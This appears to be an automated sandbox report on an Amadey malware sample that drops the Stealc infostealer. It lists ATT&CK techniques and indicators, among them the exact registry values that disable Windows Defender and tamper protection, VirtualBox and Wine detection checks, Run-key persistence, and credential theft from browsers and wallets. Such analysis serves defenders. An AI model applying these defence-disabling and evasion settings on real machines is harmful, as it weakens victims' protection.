amadey | 4feae1ea40a074d042ba08876d3c459dddcefc9d4eaad6a5a0709dd482e899df

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	a059e40180.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	a059e40180.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	a059e40180.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	a059e40180.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	a059e40180.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	a059e40180.exe

Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 5736 created 2540	5736	nSoft.exe	42

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 19 IoCs

evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	4feae1ea40a074d042ba08876d3c459dddcefc9d4eaad6a5a0709dd482e899df.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	e6a62fc7c5.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	46c1facbb6.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	b107b900a0.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	531cd8388c.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	a059e40180.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	6c3a0fbc6f.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	aa3d6bbb08.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	b489200d48.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	nSoft.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	7b7ddf7558.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe

Blocklisted process makes network request 4 IoCs

flow	pid	Process
239	5856	rundll32.exe
247	3376	cmd.exe
265	3376	cmd.exe
281	3376	cmd.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
6024	powershell.exe
1976	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Download via BitsAdmin 1 TTPs 2 IoCs

dropper

BITS Jobs

T1197

pid	Process
2968	bitsadmin.exe
5404	bitsadmin.exe

Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 38 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	531cd8388c.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	46c1facbb6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	a059e40180.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	7b7ddf7558.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	6c3a0fbc6f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	6c3a0fbc6f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	531cd8388c.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	a059e40180.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	nSoft.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	aa3d6bbb08.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	aa3d6bbb08.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	e6a62fc7c5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	b489200d48.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	b107b900a0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	e6a62fc7c5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	4feae1ea40a074d042ba08876d3c459dddcefc9d4eaad6a5a0709dd482e899df.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	4feae1ea40a074d042ba08876d3c459dddcefc9d4eaad6a5a0709dd482e899df.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	b107b900a0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	b489200d48.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	46c1facbb6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	nSoft.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	7b7ddf7558.exe

Checks computer location settings 2 TTPs 8 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	axplong.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	AllNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	Gxtuum.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	am209.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	defnur.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	4feae1ea40a074d042ba08876d3c459dddcefc9d4eaad6a5a0709dd482e899df.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	skotes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	b107b900a0.exe

Executes dropped EXE 39 IoCs

pid	Process
1900	skotes.exe
4552	stories.exe
4516	stories.tmp
2964	videojet3264.exe
4740	b107b900a0.exe
2660	axplong.exe
1488	0DMNix3.exe
3572	stealc_default2.exe
2908	alex2022.exe
3492	alex2022.exe
4352	e6a62fc7c5.exe
4024	axplong.exe
684	skotes.exe
1924	531cd8388c.exe
4672	AllNew.exe
2020	b489200d48.exe
1944	Gxtuum.exe
1860	46c1facbb6.exe
2280	2d898dd098.exe
2316	Office2024.exe
1052	trru7rd2.exe
3776	am209.exe
428	defnur.exe
5208	a059e40180.exe
5736	nSoft.exe
5868	6c3a0fbc6f.exe
1012	newwork.exe
6104	newwork.tmp
6552	aa3d6bbb08.exe
6848	7b7ddf7558.exe
3892	rzyyvjydedax.exe
2344	axplong.exe
4416	skotes.exe
4236	Gxtuum.exe
5284	defnur.exe
1088	axplong.exe
4796	skotes.exe
6464	Gxtuum.exe
6528	defnur.exe

Identifies Wine through registry keys 2 TTPs 18 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine	6c3a0fbc6f.exe
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine	531cd8388c.exe
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine	46c1facbb6.exe
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine	7b7ddf7558.exe
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine	b107b900a0.exe
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine	e6a62fc7c5.exe
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine	b489200d48.exe
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine	a059e40180.exe
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine	aa3d6bbb08.exe
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine	4feae1ea40a074d042ba08876d3c459dddcefc9d4eaad6a5a0709dd482e899df.exe

Loads dropped DLL 9 IoCs

pid	Process
4516	stories.tmp
2964	videojet3264.exe
1488	0DMNix3.exe
1488	0DMNix3.exe
3572	stealc_default2.exe
3572	stealc_default2.exe
6104	newwork.tmp
1488	0DMNix3.exe
5856	rundll32.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	a059e40180.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	a059e40180.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b489200d48.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1011748001\\b489200d48.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\46c1facbb6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1011749001\\46c1facbb6.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\2d898dd098.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1011750001\\2d898dd098.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a059e40180.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1011751001\\a059e40180.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\aa3d6bbb08.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1005208001\\aa3d6bbb08.exe"	axplong.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\7b7ddf7558.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1005209001\\7b7ddf7558.exe"	axplong.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	nSoft.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
264	pastebin.com
265	pastebin.com

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
7020	powercfg.exe
7016	powercfg.exe
2168	powercfg.exe
6708	powercfg.exe
6736	powercfg.exe
6724	powercfg.exe
6716	powercfg.exe
7008	powercfg.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x000d000000023d0a-406.dat	autoit_exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\MRT.exe	Office2024.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	rzyyvjydedax.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 19 IoCs

pid	Process
1136	4feae1ea40a074d042ba08876d3c459dddcefc9d4eaad6a5a0709dd482e899df.exe
1900	skotes.exe
4740	b107b900a0.exe
2660	axplong.exe
4024	axplong.exe
684	skotes.exe
4352	e6a62fc7c5.exe
1924	531cd8388c.exe
2020	b489200d48.exe
1860	46c1facbb6.exe
5208	a059e40180.exe
5736	nSoft.exe
5868	6c3a0fbc6f.exe
6552	aa3d6bbb08.exe
6848	7b7ddf7558.exe
2344	axplong.exe
4416	skotes.exe
1088	axplong.exe
4796	skotes.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 2908 set thread context of 3492	2908	alex2022.exe	121
PID 3892 set thread context of 6200	3892	rzyyvjydedax.exe	247
PID 3892 set thread context of 3376	3892	rzyyvjydedax.exe	251

Drops file in Windows directory 4 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\skotes.job	4feae1ea40a074d042ba08876d3c459dddcefc9d4eaad6a5a0709dd482e899df.exe
File created	C:\Windows\Tasks\axplong.job	b107b900a0.exe
File created	C:\Windows\Tasks\Gxtuum.job	AllNew.exe
File created	C:\Windows\Tasks\defnur.job	am209.exe

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5884	sc.exe
6324	sc.exe
1804	sc.exe
5644	sc.exe
5656	sc.exe
6284	sc.exe
6816	sc.exe
6764	sc.exe
5676	sc.exe
5760	sc.exe
6660	sc.exe
7100	sc.exe
2564	sc.exe
6928	sc.exe

Embeds OpenSSL 1 IoCs

Embeds OpenSSL, may be used to circumvent TLS interception.

resource	yara_rule
behavioral2/files/0x0007000000023d05-441.dat	embeds_openssl

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 9 IoCs

pid	pid_target	Process	procid_target
1700	2184	WerFault.exe	98
876	1924	WerFault.exe	127
364	1924	WerFault.exe	127
3024	3492	WerFault.exe	121
996	2020	WerFault.exe	130
5716	6848	WerFault.exe	181
5772	6848	WerFault.exe	181
5728	6848	WerFault.exe	181
3004	5868	WerFault.exe	174

System Location Discovery: System Language Discovery 1 TTPs 43 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	46c1facbb6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	skotes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	stories.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	stealc_default2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	alex2022.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nSoft.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	newwork.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	newwork.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4feae1ea40a074d042ba08876d3c459dddcefc9d4eaad6a5a0709dd482e899df.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	axplong.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ping.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	b107b900a0.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	531cd8388c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bitsadmin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	trru7rd2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7b7ddf7558.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AllNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Gxtuum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	am209.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	stories.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	alex2022.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	defnur.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	6c3a0fbc6f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	videojet3264.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	0DMNix3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2d898dd098.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage	2d898dd098.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e6a62fc7c5.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language	2d898dd098.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	a059e40180.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aa3d6bbb08.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bitsadmin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	b489200d48.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
5072	ping.exe

Checks processor information in registry 2 TTPs 10 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	stealc_default2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	stealc_default2.exe

Kills process with taskkill 5 IoCs

evasion

pid	Process
4508	taskkill.exe
3552	taskkill.exe
2296	taskkill.exe
364	taskkill.exe
3752	taskkill.exe

Modifies data under HKEY_USERS 50 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	cmd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	cmd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
